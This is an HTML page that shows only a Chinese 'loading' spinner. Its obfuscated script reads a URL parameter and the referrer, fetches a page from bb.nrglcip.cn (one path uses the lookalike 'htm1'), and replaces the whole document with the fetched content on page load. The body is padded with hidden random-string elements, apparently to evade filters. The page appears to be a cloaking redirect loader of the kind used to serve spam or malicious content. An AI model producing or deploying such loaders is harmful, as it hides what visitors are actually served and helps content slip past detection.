<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .JBtvPcr5nPq {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .JBtvPcr5nPq .ABis8mugWd {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .JBtvPcr5nPq .content {
            line-height: 50px;
            text-align: center
        }

        .JBtvPcr5nPq .img {
            width: 100%
        }

        .JBtvPcr5nPq .Ur0gtEO {
            text-align: center
        }

        .JBtvPcr5nPq .Ur0gtEO span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .JBtvPcr5nPq .Ur0gtEO span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .JBtvPcr5nPq .Ur0gtEO span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .JBtvPcr5nPq .Ur0gtEO span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .JBtvPcr5nPq .Ur0gtEO span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .JBtvPcr5nPq .Ur0gtEO span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .JBtvPcr5nPq .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function zl1TcaSuE(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var SYvwpJm = zl1TcaSuE('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ SYvwpJm +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ SYvwpJm +".html?a=share";
		}
		
        i3Ebx4=url+"#"+new Date().getTime();
        i3Ebx4 && function() {
            $.get(i3Ebx4, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>InqNr9fvixUcUzUE1oDR1s3hVrdYuV</span>
<a  href='#' style='display:none'>dJurSctaAqn91YsecbOphHTt826YXTJJND52y2</a>
<img  src='' style='display:none'>
<h1 style='display:none' >NAD3MvFWvNoSPhVP0BUxWiGiNEdsmDWt7PmYbRgxSKyrxzX29edH1QYRV6SudFv5KEMjyfcLQkVmHv1f5GFdnO75TBtRkp9rI</h1>
<span style='display:none'>InqNr9fvixUcUzUE1oDR1s3hVrdYuV</span>
<span style='display:none'>InqNr9fvixUcUzUE1oDR1s3hVrdYuV</span>
<ul style='display:none' >maDBL78MjaCobT8mIGWlBpCpgaqaaRtbCS6HHFqqBF74R3YSgswn1puChAccfLsLXT</ul>
<b style='display:none' >WhhqXKTU0x4KSB9AgBQGPED5H9P2rG</b><div class="JBtvPcr5nPq">
    <div class="ABis8mugWd">
        <div class="Ur0gtEO">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >uThflNlAfJjUMVxK9gUWNunDgTJAtzR48Rk2MBFtgYvbdiXHcIdjns</ul>
<a  href='#' style='display:none'>U0djybqmiGu8hpNU6bWZlMt30CJTAkwnnpartm8pOp</a>
<a  href='#' style='display:none'>U0djybqmiGu8hpNU6bWZlMt30CJTAkwnnpartm8pOp</a>
<ul style='display:none' >uThflNlAfJjUMVxK9gUWNunDgTJAtzR48Rk2MBFtgYvbdiXHcIdjns</ul>
<span style='display:none'>m1kL61MdkqgE68GHlbPMUj58u1LYJcNkTbVExsXWZZ78NH</span>
<span style='display:none'>m1kL61MdkqgE68GHlbPMUj58u1LYJcNkTbVExsXWZZ78NH</span>
<p  style='display:none'>PrgwGnHygWQkBWTbXn1hMKIuctypI65n0X6ITYD2LguDrN1EPFA3Jx6JqJ30F6cjJquQeDXk</p>
<p  style='display:none'>PrgwGnHygWQkBWTbXn1hMKIuctypI65n0X6ITYD2LguDrN1EPFA3Jx6JqJ30F6cjJquQeDXk</p>
<li style='display:none' >zUO7Y2lmaViGKW0Lg2sqTAf7hzI6CeKESSnA1QXr5HPqdpvaogO3aTAjbgo9Oq7K9QEPkxWAFN2Q52PbtHfCzDEqo8euDbsa14svd</li></body>
</html>